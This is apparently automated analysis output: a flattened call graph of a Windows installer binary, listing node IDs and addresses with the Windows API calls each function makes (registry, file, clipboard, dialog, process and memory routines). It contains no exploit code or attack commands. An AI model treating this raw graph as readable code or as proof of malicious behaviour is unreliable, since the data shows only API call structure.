5008->5016 5009->5008 5010->5010 5011 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5010->5011 5013 4056a1 SendMessageA 5011->5013 5013->5013 5014 4056c3 GlobalUnlock SetClipboardData CloseClipboard 5013->5014 5014->4986 5015->4976 5016->5004 5017->4977 5019 404161 SendMessageA 5018->5019 5020 40415b 5018->5020 5019->4978 5020->5019 5021 40275d 5022 402763 5021->5022 5023 402a5a 5022->5023 5024 40276b FindClose 5022->5024 5024->5023 5025 401a5e 5026 402bac 17 API calls 5025->5026 5027 401a67 5026->5027 5028 402bac 17 API calls 5027->5028 5029 401a0e 5028->5029 5030 40495e 5031 40498a 5030->5031 5032 40496e 5030->5032 5034 404990 SHGetPathFromIDListA 5031->5034 5035 4049bd 5031->5035 5041 4057f7 GetDlgItemTextA 5032->5041 5037 4049a0 5034->5037 5040 4049a7 SendMessageA 5034->5040 5036 40497b SendMessageA 5036->5031 5038 40140b 2 API calls 5037->5038 5038->5040 5040->5035 5041->5036 5042 4029de 5043 406500 5 API calls 5042->5043 5044 4029e5 5043->5044 5045 402bce 17 API calls 5044->5045 5046 4029ee 5045->5046 5048 402a2a 5046->5048 5052 40614a 5046->5052 5049 4029fc 5049->5048 5056 406134 5049->5056 5053 406155 5052->5053 5054 406178 IIDFromString 5053->5054 5055 406171 5053->5055 5054->5049 5055->5049 5059 406119 WideCharToMultiByte 5056->5059 5058 402a1d CoTaskMemFree 5058->5048 5059->5058 5060 4027df 5061 402bce 17 API calls 5060->5061 5063 4027ed 5061->5063 5062 402803 5065 405c6b 2 API calls 5062->5065 5063->5062 5064 402bce 17 API calls 5063->5064 5064->5062 5066 402809 5065->5066 5088 405c90 GetFileAttributesA CreateFileA 5066->5088 5068 402816 5069 402822 GlobalAlloc 5068->5069 5070 4028bf 5068->5070 5071 4028b6 CloseHandle 5069->5071 5072 40283b 5069->5072 5073 4028c7 DeleteFileA 5070->5073 5074 4028da 5070->5074 5071->5070 5089 403300 SetFilePointer 5072->5089 5073->5074 5076 402841 5077 4032ea ReadFile 5076->5077 5078 40284a GlobalAlloc 5077->5078 5079 402894 5078->5079 5080 40285a 5078->5080 5082 405d37 WriteFile 5079->5082 5081 4030d8 31 API calls 5080->5081 5083 402867 5081->5083 5084 4028a0 GlobalFree 5082->5084 5087 40288b GlobalFree 5083->5087 5085 4030d8 31 API calls 5084->5085 5086 4028b3 5085->5086 5086->5071 5087->5079 5088->5068 5089->5076 4665 4023e0 4666 402bce 17 API calls 4665->4666 4667 4023f1 4666->4667 4668 402bce 17 API calls 4667->4668 4669 4023fa 4668->4669 4670 402bce 17 API calls 4669->4670 4671 402404 GetPrivateProfileStringA 4670->4671 5090 4028e0 5091 402bac 17 API calls 5090->5091 5092 4028e6 5091->5092 5093 402925 5092->5093 5094 40290e 5092->5094 5101 4027bf 5092->5101 5095 40293f 5093->5095 5096 40292f 5093->5096 5097 402922 5094->5097 5098 402913 5094->5098 5100 40618a 17 API calls 5095->5100 5099 402bac 17 API calls 5096->5099 5105 406055 wsprintfA 5097->5105 5104 4060f7 lstrcpynA 5098->5104 5099->5101 5100->5101 5104->5101 5105->5101 5106 401b63 5107 402bce 17 API calls 5106->5107 5108 401b6a 5107->5108 5109 402bac 17 API calls 5108->5109 5110 401b73 wsprintfA 5109->5110 5111 402a5a 5110->5111 5112 72a41000 5113 72a4101b 5 API calls 5112->5113 5114 72a41019 5113->5114 5115 401d65 5116 401d78 GetDlgItem 5115->5116 5117 401d6b 5115->5117 5119 401d72 5116->5119 5118 402bac 17 API calls 5117->5118 5118->5119 5120 401db9 GetClientRect LoadImageA SendMessageA 5119->5120 5121 402bce 17 API calls 5119->5121 5123 401e1a 5120->5123 5125 401e26 5120->5125 5121->5120 5124 401e1f DeleteObject 5123->5124 5123->5125 5124->5125 5126 4042e6 5127 4042fc 5126->5127 5131 404408 5126->5131 5129 40417b 18 API calls 5127->5129 5128 404477 5130 404481 GetDlgItem 5128->5130 5133 404541 5128->5133 5132 404352 5129->5132 5134 404497 5130->5134 5135 4044ff 5130->5135 5131->5128 5131->5133 5136 40444c GetDlgItem SendMessageA 5131->5136 5137 40417b 18 API calls 5132->5137 5138 4041e2 8 API calls 5133->5138 5134->5135 5143 4044bd SendMessageA LoadCursorA SetCursor 5134->5143 5135->5133 5139 404511 5135->5139 5159 40419d EnableWindow 5136->5159 5141 40435f CheckDlgButton 5137->5141 5142 40453c 5138->5142 5144 404517 SendMessageA 5139->5144 5145 404528 5139->5145 5157 40419d EnableWindow 5141->5157 5163 40458a 5143->5163 5144->5145 5145->5142 5149 40452e SendMessageA 5145->5149 5146 404472 5160 404566 5146->5160 5149->5142 5151 40437d GetDlgItem 5158 4041b0 SendMessageA 5151->5158 5154 404393 SendMessageA 5155 4043b1 GetSysColor 5154->5155 5156 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5154->5156 5155->5156 5156->5142 5157->5151 5158->5154 5159->5146 5161 404574 5160->5161 5162 404579 SendMessageA 5160->5162 5161->5162 5162->5128 5166 4057d9 ShellExecuteExA 5163->5166 5165 4044f0 LoadCursorA SetCursor 5165->5135 5166->5165 4713 40166a 4714 402bce 17 API calls 4713->4714 4715 401671 4714->4715 4716 402bce 17 API calls 4715->4716 4717 40167a 4716->4717 4718 402bce 17 API calls 4717->4718 4719 401683 MoveFileA 4718->4719 4720 401696 4719->4720 4726 40168f 4719->4726 4722 40646b 2 API calls 4720->4722 4724 4022e2 4720->4724 4721 401423 24 API calls 4721->4724 4723 4016a5 4722->4723 4723->4724 4725 405ed6 36 API calls 4723->4725 4725->4726 4726->4721 4727 40216b 4728 402bce 17 API calls 4727->4728 4729 402172 4728->4729 4730 402bce 17 API calls 4729->4730 4731 40217c 4730->4731 4732 402bce 17 API calls 4731->4732 4733 402186 4732->4733 4734 402bce 17 API calls 4733->4734 4735 402193 4734->4735 4736 402bce 17 API calls 4735->4736 4737 40219d 4736->4737 4738 4021df CoCreateInstance 4737->4738 4739 402bce 17 API calls 4737->4739 4742 4021fe 4738->4742 4744 4022ac 4738->4744 4739->4738 4740 401423 24 API calls 4741 4022e2 4740->4741 4743 40228c MultiByteToWideChar 4742->4743 4742->4744 4743->4744 4744->4740 4744->4741 5167 4022eb 5168 402bce 17 API calls 5167->5168 5169 4022f1 5168->5169 5170 402bce 17 API calls 5169->5170 5171 4022fa 5170->5171 5172 402bce 17 API calls 5171->5172 5173 402303 5172->5173 5174 40646b 2 API calls 5173->5174 5175 40230c 5174->5175 5176 40231d lstrlenA lstrlenA 5175->5176 5181 402310 5175->5181 5178 40521e 24 API calls 5176->5178 5177 40521e 24 API calls 5179 402318 5177->5179 5180 402359 SHFileOperationA 5178->5180 5180->5179 5180->5181 5181->5177 5181->5179 4754 40266d 4755 402bac 17 API calls 4754->4755 4756 402677 4755->4756 4757 405d08 ReadFile 4756->4757 4758 4026e7 4756->4758 4760 4026f7 4756->4760 4762 4026e5 4756->4762 4757->4756 4763 406055 wsprintfA 4758->4763 4761 40270d SetFilePointer 4760->4761 4760->4762 4761->4762 4763->4762 5182 40236d 5183 402374 5182->5183 5185 402387 5182->5185 5184 40618a 17 API calls 5183->5184 5186 402381 5184->5186 5186->5185 5187 405813 MessageBoxIndirectA 5186->5187 5187->5185 5188 4019ed 5189 402bce 17 API calls 5188->5189 5190 4019f4 5189->5190 5191 402bce 17 API calls 5190->5191 5192 4019fd 5191->5192 5193 401a04 lstrcmpiA 5192->5193 5194 401a16 lstrcmpA 5192->5194 5195 401a0a 5193->5195 5194->5195 5196 40296e 5197 402bac 17 API calls 5196->5197 5198 402974 5197->5198 5199 4029af 5198->5199 5200 4027bf 5198->5200 5202 402986 5198->5202 5199->5200 5201 40618a 17 API calls 5199->5201 5201->5200 5202->5200 5204 406055 wsprintfA 5202->5204 5204->5200 5205 4014f4 SetForegroundWindow 5206 402a5a 5205->5206 4800 402476 4801 402bce 17 API calls 4800->4801 4802 402488 4801->4802 4803 402bce 17 API calls 4802->4803 4804 402492 4803->4804 4817 402c5e 4804->4817 4807 402a5a 4808 4024c7 4809 4024d3 4808->4809 4812 402bac 17 API calls 4808->4812 4813 4024f5 RegSetValueExA 4809->4813 4814 4030d8 31 API calls 4809->4814 4810 402bce 17 API calls 4811 4024c0 lstrlenA 4810->4811 4811->4808 4812->4809 4815 40250b RegCloseKey 4813->4815 4814->4813 4815->4807 4818 402c79 4817->4818 4821 405fab 4818->4821 4822 405fba 4821->4822 4823 4024a2 4822->4823 4824 405fc5 RegCreateKeyExA 4822->4824 4823->4807 4823->4808 4823->4810 4824->4823 5207 402777 5208 40277d 5207->5208 5209 402781 FindNextFileA 5208->5209 5211 402793 5208->5211 5210 4027d2 5209->5210 5209->5211 5213 4060f7 lstrcpynA 5210->5213 5213->5211 5214 401ef9 5215 402bce 17 API calls 5214->5215 5216 401eff 5215->5216 5217 402bce 17 API calls 5216->5217 5218 401f08 5217->5218 5219 402bce 17 API calls 5218->5219 5220 401f11 5219->5220 5221 402bce 17 API calls 5220->5221 5222 401f1a 5221->5222 5223 401423 24 API calls 5222->5223 5224 401f21 5223->5224 5231 4057d9 ShellExecuteExA 5224->5231 5226 401f5c 5227 406575 5 API calls 5226->5227 5229 4027bf 5226->5229 5228 401f76 CloseHandle 5227->5228 5228->5229 5231->5226 4825 401f7b 4826 402bce 17 API calls 4825->4826 4827 401f81 4826->4827 4828 40521e 24 API calls 4827->4828 4829 401f8b 4828->4829 4830 405796 2 API calls 4829->4830 4831 401f91 4830->4831 4833 4027bf 4831->4833 4838 401fb2 CloseHandle 4831->4838 4840 406575 WaitForSingleObject 4831->4840 4835 401fa6 4836 401fb4 4835->4836 4837 401fab 4835->4837 4836->4838 4845 406055 wsprintfA 4837->4845 4838->4833 4841 40658f 4840->4841 4842 4065a1 GetExitCodeProcess 4841->4842 4843 40653c 2 API calls 4841->4843 4842->4835 4844 406596 WaitForSingleObject 4843->4844 4844->4841 4845->4838 5232 401ffb 5233 402bce 17 API calls 5232->5233 5234 402002 5233->5234 5235 406500 5 API calls 5234->5235 5236 402011 5235->5236 5237 402029 GlobalAlloc 5236->5237 5238 402091 5236->5238 5237->5238 5239 40203d 5237->5239 5240 406500 5 API calls 5239->5240 5241 402044 5240->5241 5242 406500 5 API calls 5241->5242 5243 40204e 5242->5243 5243->5238 5247 406055 wsprintfA 5243->5247 5245 402085 5248 406055 wsprintfA 5245->5248 5247->5245 5248->5238 5249 4018fd 5250 401934 5249->5250 5251 402bce 17 API calls 5250->5251 5252 401939 5251->5252 5253 4058bf 67 API calls 5252->5253 5254 401942 5253->5254 5255 401000 5256 401037 BeginPaint GetClientRect 5255->5256 5257 40100c DefWindowProcA 5255->5257 5259 4010f3 5256->5259 5260 401179 5257->5260 5261 401073 CreateBrushIndirect FillRect DeleteObject 5259->5261 5262 4010fc 5259->5262 5261->5259 5263 401102 CreateFontIndirectA 5262->5263 5264 401167 EndPaint 5262->5264 5263->5264 5265 401112 6 API calls 5263->5265 5264->5260 5265->5264 5266 401900 5267 402bce 17 API calls 5266->5267 5268 401907 5267->5268 5269 405813 MessageBoxIndirectA 5268->5269 5270 401910 5269->5270 5271 404b80 GetDlgItem GetDlgItem 5272 404bd6 7 API calls 5271->5272 5278 404dfd 5271->5278 5273 404c72 SendMessageA 5272->5273 5274 404c7e DeleteObject 5272->5274 5273->5274 5275 404c89 5274->5275 5277 404cc0 5275->5277 5279 40618a 17 API calls 5275->5279 5276 404edf 5281 404f8b 5276->5281 5286 404df0 5276->5286 5291 404f38 SendMessageA 5276->5291 5280 40417b 18 API calls 5277->5280 5278->5276 5305 404e6c 5278->5305 5325 404ace SendMessageA 5278->5325 5284 404ca2 SendMessageA SendMessageA 5279->5284 5285 404cd4 5280->5285 5282 404f95 SendMessageA 5281->5282 5283 404f9d 5281->5283 5282->5283 5293 404fb6 5283->5293 5294 404faf ImageList_Destroy 5283->5294 5302 404fc6 5283->5302 5284->5275 5290 40417b 18 API calls 5285->5290 5288 4041e2 8 API calls 5286->5288 5287 404ed1 SendMessageA 5287->5276 5292 40518b 5288->5292 5306 404ce5 5290->5306 5291->5286 5296 404f4d SendMessageA 5291->5296 5297 404fbf GlobalFree 5293->5297 5293->5302 5294->5293 5295 40513f 5295->5286 5300 405151 ShowWindow GetDlgItem ShowWindow 5295->5300 5299 404f60 5296->5299 5297->5302 5298 404dbf GetWindowLongA SetWindowLongA 5301 404dd8 5298->5301 5308 404f71 SendMessageA 5299->5308 5300->5286 5303 404df5 5301->5303 5304 404ddd ShowWindow 5301->5304 5302->5295 5317 405001 5302->5317 5330 404b4e 5302->5330 5324 4041b0 SendMessageA 5303->5324 5323 4041b0 SendMessageA 5304->5323 5305->5276 5305->5287 5306->5298 5307 404d37 SendMessageA 5306->5307 5309 404dba 5306->5309 5312 404d75 SendMessageA 5306->5312 5313 404d89 SendMessageA 5306->5313 5307->5306 5308->5281 5309->5298 5309->5301 5312->5306 5313->5306 5315 40510b 5316 405115 InvalidateRect 5315->5316 5319 405121 5315->5319 5316->5319 5318 40502f SendMessageA 5317->5318 5322 405045 5317->5322 5318->5322 5319->5295 5339 404a89 5319->5339 5321 4050b9 SendMessageA SendMessageA 5321->5322 5322->5315 5322->5321 5323->5286 5324->5278 5326 404af1 GetMessagePos ScreenToClient SendMessageA 5325->5326 5327 404b2d SendMessageA 5325->5327 5328 404b25 5326->5328 5329 404b2a 5326->5329 5327->5328 5328->5305 5329->5327 5342 4060f7 lstrcpynA 5330->5342 5332 404b61 5343 406055 wsprintfA 5332->5343 5334 404b6b 5335 40140b 2 API calls 5334->5335 5336 404b74 5335->5336 5344 4060f7 lstrcpynA 5336->5344 5338 404b7b 5338->5317 5345 4049c4 5339->5345 5341 404a9e 5341->5295 5342->5332 5343->5334 5344->5338 5346 4049da 5345->5346 5347 40618a 17 API calls 5346->5347 5348 404a3e 5347->5348 5349 40618a 17 API calls 5348->5349 5350 404a49 5349->5350 5351 40618a 17 API calls 5350->5351 5352 404a5f lstrlenA wsprintfA SetDlgItemTextA 5351->5352 5352->5341 5353 401502 5354 40150a 5353->5354 5356 40151d 5353->5356 5355 402bac 17 API calls 5354->5355 5355->5356 5357 72a410e0 5366 72a4110e 5357->5366 5358 72a411c4 GlobalFree 5359 72a412ad 2 API calls 5359->5366 5360 72a411c3 5360->5358 5361 72a41266 2 API calls 5364 72a411b1 GlobalFree 5361->5364 5362 72a41155 GlobalAlloc 5362->5366 5363 72a411ea GlobalFree 5363->5366 5364->5366 5365 72a412d1 lstrcpyA 5365->5366 5366->5358 5366->5359 5366->5360 5366->5361 5366->5362 5366->5363 5366->5364 5366->5365 5367 402604 5368 402bce 17 API calls 5367->5368 5369 40260b 5368->5369 5372 405c90 GetFileAttributesA CreateFileA 5369->5372 5371 402617 5372->5371 5373 72a42be3 5374 72a42bfb 5373->5374 5375 72a41534 2 API calls 5374->5375 5376 72a42c16 5375->5376 5377 401b87 5378 401b94 5377->5378 5379 401bd8 5377->5379 5382 401c1c 5378->5382 5387 401bab 5378->5387 5380 401c01 GlobalAlloc 5379->5380 5381 401bdc 5379->5381 5383 40618a 17 API calls 5380->5383 5391 402387 5381->5391 5398 4060f7 lstrcpynA 5381->5398 5384 40618a 17 API calls 5382->5384 5382->5391 5383->5382 5386 402381 5384->5386 5386->5391 5392 405813 MessageBoxIndirectA 5386->5392 5396 4060f7 lstrcpynA 5387->5396 5389 401bee GlobalFree 5389->5391 5390 401bba 5397 4060f7 lstrcpynA 5390->5397 5392->5391 5394 401bc9 5399 4060f7 lstrcpynA 5394->5399 5396->5390 5397->5394 5398->5389 5399->5391 4378 402588 4390 402c0e 4378->4390 4381 402bac 17 API calls 4382 40259b 4381->4382 4383 4025a9 4382->4383 4388 4027bf 4382->4388 4384 4025c2 RegEnumValueA 4383->4384 4385 4025b6 RegEnumKeyA 4383->4385 4386 4025de RegCloseKey 4384->4386 4387 4025d7 4384->4387 4385->4386 4386->4388 4387->4386 4391 402bce 17 API calls 4390->4391 4392 402c25 4391->4392 4393 405f7d RegOpenKeyExA 4392->4393 4394 402592 4393->4394 4394->4381 4395 401389 4397 401390 4395->4397 4396 4013fe 4397->4396 4398 4013cb MulDiv SendMessageA 4397->4398 4398->4397 5400 40460d 5401 404639 5400->5401 5402 40464a 5400->5402 5461 4057f7 GetDlgItemTextA 5401->5461 5404 404656 GetDlgItem 5402->5404 5408 4046b5 5402->5408 5406 40466a 5404->5406 5405 404644 5409 4063d2 5 API calls 5405->5409 5410 40467e SetWindowTextA 5406->5410 5413 405b28 4 API calls 5406->5413 5407 404799 5459 404943 5407->5459 5463 4057f7 GetDlgItemTextA 5407->5463 5408->5407 5415 40618a 17 API calls 5408->5415 5408->5459 5409->5402 5414 40417b 18 API calls 5410->5414 5412 4041e2 8 API calls 5417 404957 5412->5417 5418 404674 5413->5418 5419 40469a 5414->5419 5420 404729 SHBrowseForFolderA 5415->5420 5416 4047c9 5421 405b7d 18 API calls 5416->5421 5418->5410 5427 405a8f 3 API calls 5418->5427 5422 40417b 18 API calls 5419->5422 5420->5407 5423 404741 CoTaskMemFree 5420->5423 5424 4047cf 5421->5424 5425 4046a8 5422->5425 5426 405a8f 3 API calls 5423->5426 5464 4060f7 lstrcpynA 5424->5464 5462 4041b0 SendMessageA 5425->5462 5434 40474e 5426->5434 5427->5410 5430 4046ae 5433 406500 5 API calls 5430->5433 5431 404785 SetDlgItemTextA 5431->5407 5432 4047e6 5435 406500 5 API calls 5432->5435 5433->5408 5434->5431 5436 40618a 17 API calls 5434->5436 5443 4047ed 5435->5443 5437 40476d lstrcmpiA 5436->5437 5437->5431 5440 40477e lstrcatA 5437->5440 5438 404829 5465 4060f7 lstrcpynA 5438->5465 5440->5431 5441 404830 5442 405b28 4 API calls 5441->5442 5444 404836 GetDiskFreeSpaceA 5442->5444 5443->5438 5447 405ad6 2 API calls 5443->5447 5449 404881 5443->5449 5446 40485a MulDiv 5444->5446 5444->5449 5446->5449 5447->5443 5448 4048f2 5451 404915 5448->5451 5453 40140b 2 API calls 5448->5453 5449->5448 5450 404a89 20 API calls 5449->5450 5452 4048df 5450->5452 5466 40419d EnableWindow 5451->5466 5454 4048f4 SetDlgItemTextA 5452->5454 5455 4048e4 5452->5455 5453->5451 5454->5448 5458 4049c4 20 API calls 5455->5458 5457 404931 5457->5459 5460 404566 SendMessageA 5457->5460 5458->5448 5459->5412 5460->5459 5461->5405 5462->5430 5463->5416 5464->5432 5465->5441 5466->5457 5467 401490 5468 40521e 24 API calls 5467->5468 5469 401497 5468->5469 5470 405192 5471 4051a2 5470->5471 5472 4051b6 5470->5472 5473 4051ff 5471->5473 5474 4051a8 5471->5474 5475 4051be IsWindowVisible 5472->5475 5481 4051d5 5472->5481 5476 405204 CallWindowProcA 5473->5476 5477 4041c7 SendMessageA 5474->5477 5475->5473 5478 4051cb 5475->5478 5479 4051b2 5476->5479 5477->5479 5480 404ace 5 API calls 5478->5480 5480->5481 5481->5476 5482 404b4e 4 API calls 5481->5482 5482->5473 4404 402516 4405 402c0e 17 API calls 4404->4405 4406 402520 4405->4406 4407 402bce 17 API calls 4406->4407 4408 402529 4407->4408 4409 402533 RegQueryValueExA 4408->4409 4413 4027bf 4408->4413 4410 402559 RegCloseKey 4409->4410 4411 402553 4409->4411 4410->4413 4411->4410 4415 406055 wsprintfA 4411->4415 4415->4410 4458 40239c 4459 4023a4 4458->4459 4460 4023aa 4458->4460 4461 402bce 17 API calls 4459->4461 4462 4023ba 4460->4462 4464 402bce 17 API calls 4460->4464 4461->4460 4463 4023c8 4462->4463 4465 402bce 17 API calls 4462->4465 4466 402bce 17 API calls 4463->4466 4464->4462 4465->4463 4467 4023d1 WritePrivateProfileStringA 4466->4467 4468 40209d 4469 40215d 4468->4469 4470 4020af 4468->4470 4472 401423 24 API calls 4469->4472 4471 402bce 17 API calls 4470->4471 4473 4020b6 4471->4473 4479 4022e2 4472->4479 4474 402bce 17 API calls 4473->4474 4475 4020bf 4474->4475 4476 4020d4 LoadLibraryExA 4475->4476 4477 4020c7 GetModuleHandleA 4475->4477 4476->4469 4478 4020e4 GetProcAddress 4476->4478 4477->4476 4477->4478 4480 402130 4478->4480 4481 4020f3 4478->4481 4484 40521e 24 API calls 4480->4484 4482 402112 4481->4482 4483 4020fb 4481->4483 4489 72a416db 4482->4489 4531 401423 4483->4531 4486 402103 4484->4486 4486->4479 4487 402151 FreeLibrary 4486->4487 4487->4479 4490 72a4170b 4489->4490 4534 72a41a98 4490->4534 4492 72a41712 4493 72a41834 4492->4493 4494 72a41723 4492->4494 4495 72a4172a 4492->4495 4493->4486 4584 72a422af 4494->4584 4568 72a422f1 4495->4568 4499 72a4174f 4501 72a41770 4499->4501 4502 72a4178e 4499->4502 4597 72a424d8 4501->4597 4505 72a41794 4502->4505 4506 72a417dc 4502->4506 4503 72a41740 4508 72a41746 4503->4508 4513 72a41751 4503->4513 4504 72a41759 4504->4499 4594 72a42cc3 4504->4594 4616 72a4156b 4505->4616 4511 72a424d8 11 API calls 4506->4511 4508->4499 4578 72a42a38 4508->4578 4517 72a417cd 4511->4517 4512 72a41776 4608 72a41559 4512->4608 4588 72a426b2 4513->4588 4522 72a41823 4517->4522 4622 72a4249e 4517->4622 4519 72a41757 4519->4499 4520 72a424d8 11 API calls 4520->4517 4522->4493 4525 72a4182d GlobalFree 4522->4525 4525->4493 4528 72a4180f 4528->4522 4626 72a414e2 wsprintfA 4528->4626 4529 72a41808 FreeLibrary 4529->4528 4532 40521e 24 API calls 4531->4532 4533 401431 4532->4533 4533->4486 4629 72a41215 GlobalAlloc 4534->4629 4536 72a41abf 4630 72a41215 GlobalAlloc 4536->4630 4538 72a41d00 GlobalFree GlobalFree GlobalFree 4539 72a41d1d 4538->4539 4552 72a41d67 4538->4552 4541 72a420f1 4539->4541 4549 72a41d32 4539->4549 4539->4552 4540 72a41bbd GlobalAlloc 4555 72a41aca 4540->4555 4542 72a42113 GetModuleHandleA 4541->4542 4541->4552 4545 72a42124 LoadLibraryA 4542->4545 4546 72a42139 4542->4546 4543 72a41c08 lstrcpyA 4548 72a41c12 lstrcpyA 4543->4548 4544 72a41c26 GlobalFree 4544->4555 4545->4546 4545->4552 4637 72a415c2 GetProcAddress 4546->4637 4548->4555 4549->4552 4633 72a41224 4549->4633 4550 72a4218a 4550->4552 4554 72a42197 lstrlenA 4550->4554 4551 72a41fb7 4636 72a41215 GlobalAlloc 4551->4636 4552->4492 4638 72a415c2 GetProcAddress 4554->4638 4555->4538 4555->4540 4555->4543 4555->4544 4555->4548 4555->4551 4555->4552 4557 72a41ef9 GlobalFree 4555->4557 4558 72a42033 4555->4558 4561 72a41c64 4555->4561 4563 72a41224 2 API calls 4555->4563 4557->4555 4558->4552 4565 72a4208c lstrcpyA 4558->4565 4559 72a4214b 4559->4550 4566 72a42174 GetProcAddress 4559->4566 4561->4555 4631 72a41534 GlobalSize GlobalAlloc 4561->4631 4562 72a421b0 4562->4552 4563->4555 4565->4552 4566->4550 4567 72a41fbf 4567->4492 4576 72a4230a 4568->4576 4570 72a42446 GlobalFree 4571 72a41730 4570->4571 4570->4576 4571->4499 4571->4503 4571->4504 4572 72a423b8 GlobalAlloc MultiByteToWideChar 4574 72a423e4 GlobalAlloc CLSIDFromString GlobalFree 4572->4574 4575 72a42405 4572->4575 4573 72a41224 GlobalAlloc lstrcpynA 4573->4576 4574->4570 4575->4570 4644 72a42646 4575->4644 4576->4570 4576->4572 4576->4573 4576->4575 4640 72a412ad 4576->4640 4580 72a42a4a 4578->4580 4579 72a42aef VirtualAllocEx 4583 72a42b0d 4579->4583 4580->4579 4582 72a42bd9 4582->4499 4647 72a429e4 4583->4647 4585 72a422c4 4584->4585 4586 72a422cf GlobalAlloc 4585->4586 4587 72a41729 4585->4587 4586->4585 4587->4495 4592 72a426e2 4588->4592 4589 72a42790 4591 72a42796 GlobalSize 4589->4591 4593 72a427a0 4589->4593 4590 72a4277d GlobalAlloc 4590->4593 4591->4593 4592->4589 4592->4590 4593->4519 4596 72a42cce 4594->4596 4595 72a42d0e GlobalFree 4596->4595 4651 72a41215 GlobalAlloc 4597->4651 4599 72a42574 StringFromGUID2 WideCharToMultiByte 4605 72a424e4 4599->4605 4600 72a42563 lstrcpynA 4600->4605 4601 72a42598 WideCharToMultiByte 4601->4605 4602 72a425b9 wsprintfA 4602->4605 4603 72a425dd GlobalFree 4603->4605 4604 72a42617 GlobalFree 4604->4512 4605->4599 4605->4600 4605->4601 4605->4602 4605->4603 4605->4604 4606 72a41266 2 API calls 4605->4606 4652 72a412d1 4605->4652 4606->4605 4656 72a41215 GlobalAlloc 4608->4656 4610 72a4155e 4611 72a4156b 2 API calls 4610->4611 4612 72a41568 4611->4612 4613 72a41266 4612->4613 4614 72a4126f GlobalAlloc lstrcpynA 4613->4614 4615 72a412a8 GlobalFree 4613->4615 4614->4615 4615->4517 4617 72a415a4 lstrcpyA 4616->4617 4618 72a41577 wsprintfA 4616->4618 4621 72a415bd 4617->4621 4618->4621 4621->4520 4623 72a424ac 4622->4623 4625 72a417ef 4622->4625 4624 72a424c5 GlobalFree 4623->4624 4623->4625 4624->4623 4625->4528 4625->4529 4627 72a41266 2 API calls 4626->4627 4628 72a41503 4627->4628 4628->4522 4629->4536 4630->4555 4632 72a41552 4631->4632 4632->4561 4639 72a41215 GlobalAlloc 4633->4639 4635 72a41233 lstrcpynA 4635->4552 4636->4567 4637->4559 4638->4562 4639->4635 4641 72a412b4 4640->4641 4642 72a41224 2 API calls 4641->4642 4643 72a412cf 4642->4643 4643->4576 4645 72a42654 VirtualAlloc 4644->4645 4646 72a426aa 4644->4646 4645->4646 4646->4575 4648 72a429ef 4647->4648 4649 72a429f4 GetLastError 4648->4649 4650 72a429ff 4648->4650 4649->4650 4650->4582 4651->4605 4653 72a412f9 4652->4653 4654 72a412da 4652->4654 4653->4605 4654->4653 4655 72a412e0 lstrcpyA 4654->4655 4655->4653 4656->4610 4657 40159d 4658 402bce 17 API calls 4657->4658 4659 4015a4 SetFileAttributesA 4658->4659 4660 4015b6 4659->4660 5483 40149d 5484 402387 5483->5484 5485 4014ab PostQuitMessage 5483->5485 5485->5484 5486 401a1e 5487 402bce 17 API calls 5486->5487 5488 401a27 ExpandEnvironmentStringsA 5487->5488 5489 401a3b 5488->5489 5491 401a4e 5488->5491 5490 401a40 lstrcmpA 5489->5490 5489->5491 5490->5491 4661 40171f 4662 402bce 17 API calls 4661->4662 4663 401726 SearchPathA 4662->4663 4664 401741 4663->4664 5497 401d1f 5498 402bac 17 API calls 5497->5498 5499 401d26 5498->5499 5500 402bac 17 API calls 5499->5500 5501 401d32 GetDlgItem 5500->5501 5502 402620 5501->5502 4672 402421 4673 402453 4672->4673 4674 402428 4672->4674 4675 402bce 17 API calls 4673->4675 4676 402c0e 17 API calls 4674->4676 4677 40245a 4675->4677 4678 40242f 4676->4678 4684 402c8c 4677->4684 4680 402439 4678->4680 4682 402467 4678->4682 4681 402bce 17 API calls 4680->4681 4683 402440 RegDeleteValueA RegCloseKey 4681->4683 4683->4682 4685 402c98 4684->4685 4686 402c9f 4684->4686 4685->4682 4686->4685 4688 402cd0 4686->4688 4689 405f7d RegOpenKeyExA 4688->4689 4690 402cfe 4689->4690 4691 402db3 4690->4691 4692 402d08 4690->4692 4691->4685 4693 402d31 4692->4693 4694 402d0e RegEnumValueA 4692->4694 4695 402d98 RegCloseKey 4693->4695 4696 402d6d RegEnumKeyA 4693->4696 4697 402d76 RegCloseKey 4693->4697 4699 402cd0 6 API calls 4693->4699 4694->4693 4694->4695 4695->4691 4696->4693 4696->4697 4698 406500 5 API calls 4697->4698 4700 402d86 4698->4700 4699->4693 4701 402da8 4700->4701 4702 402d8a RegDeleteKeyA 4700->4702 4701->4691 4702->4691 4703 4027a1 4704 402bce 17 API calls 4703->4704 4705 4027a8 FindFirstFileA 4704->4705 4706 4027cb 4705->4706 4710 4027bb 4705->4710 4707 4027d2 4706->4707 4711 406055 wsprintfA 4706->4711 4712 4060f7 lstrcpynA 4707->4712 4711->4707 4712->4710 5503 402626 5504 40262b 5503->5504 5505 40263f 5503->5505 5506 402bac 17 API calls 5504->5506 5507 402bce 17 API calls 5505->5507 5509 402634 5506->5509 5508 402646 lstrlenA 5507->5508 5508->5509 5510 402668 5509->5510 5511 405d37 WriteFile 5509->5511 5511->5510 5512 403ca7 5513 403dfa 5512->5513 5514 403cbf 5512->5514 5516 403e4b 5513->5516 5517 403e0b GetDlgItem GetDlgItem 5513->5517 5514->5513 5515 403ccb 5514->5515 5518 403cd6 SetWindowPos 5515->5518 5519 403ce9 5515->5519 5521 403ea5 5516->5521 5526 401389 2 API calls 5516->5526 5520 40417b 18 API calls 5517->5520 5518->5519 5523 403d06 5519->5523 5524 403cee ShowWindow 5519->5524 5525 403e35 SetClassLongA 5520->5525 5522 4041c7 SendMessageA 5521->5522 5527 403df5 5521->5527 5551 403eb7 5522->5551 5528 403d28 5523->5528 5529 403d0e DestroyWindow 5523->5529 5524->5523 5530 40140b 2 API calls 5525->5530 5531 403e7d 5526->5531 5532 403d2d SetWindowLongA 5528->5532 5533 403d3e 5528->5533 5580 404104 5529->5580 5530->5516 5531->5521 5534 403e81 SendMessageA 5531->5534 5532->5527 5537 403db5 5533->5537 5538 403d4a GetDlgItem 5533->5538 5534->5527 5535 40140b 2 API calls 5535->5551 5536 404106 DestroyWindow EndDialog 5536->5580 5541 4041e2 8 API calls 5537->5541 5539 403d7a 5538->5539 5540 403d5d SendMessageA IsWindowEnabled 5538->5540 5544 403d87 5539->5544 5545 403dce SendMessageA 5539->5545 5546 403d9a 5539->5546 5554 403d7f 5539->5554 5540->5527 5540->5539 5541->5527 5542 404135 ShowWindow 5542->5527 5543 40618a 